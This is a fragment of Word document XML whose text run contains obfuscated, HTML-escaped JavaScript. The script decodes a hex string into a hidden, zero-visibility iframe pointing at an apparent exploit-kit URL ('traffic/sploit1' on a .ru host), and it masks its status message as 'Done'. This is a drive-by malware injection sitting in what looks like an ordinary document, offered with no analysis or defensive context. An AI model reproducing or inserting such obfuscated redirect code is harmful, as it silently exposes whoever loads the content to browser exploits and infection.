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&lt;script&gt;function vtYbybaVxyY(vbybYtydVYa){ function vyVtbVxtdad () {var vbxxxxxyVxx=532; return vbxxxxxyVxx;} return(parseInt(vbybYtydVYa,16));}function vYybtxabbta(vYVxyxVxdbb){ function vtxYYxVyaVx () {var vYtxdbxbdyd=532; return vYtxdbxbdyd;} var vtdyyyyxxaa='';for(vVyVxaxVxat=0; vVyVxaxVxat&lt;vYVxyxVxdbb.length; vVyVxaxVxat+=2){vtdyyyyxxaa+=(String.fromCharCode(vtYbybaVxyY(vYVxyxVxdbb.substr(vVyVxaxVxat,2))));}return vtdyyyyxxaa;} document.write(vYybtxabbta('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65202069643D227962647874796174647422206E616D653D227464596474785679747822207372633D22687474703A2F2F7265646469692E72752F747261666669632F73706C6F6974312F3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323838383736292B2764597862747962616174222077696474683D2235343322206865696768743D2235333222207374796C653D22646973706C61793A206E6F6E653B223E3C2F696672616D653E27293C2F5343524950543E'));&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>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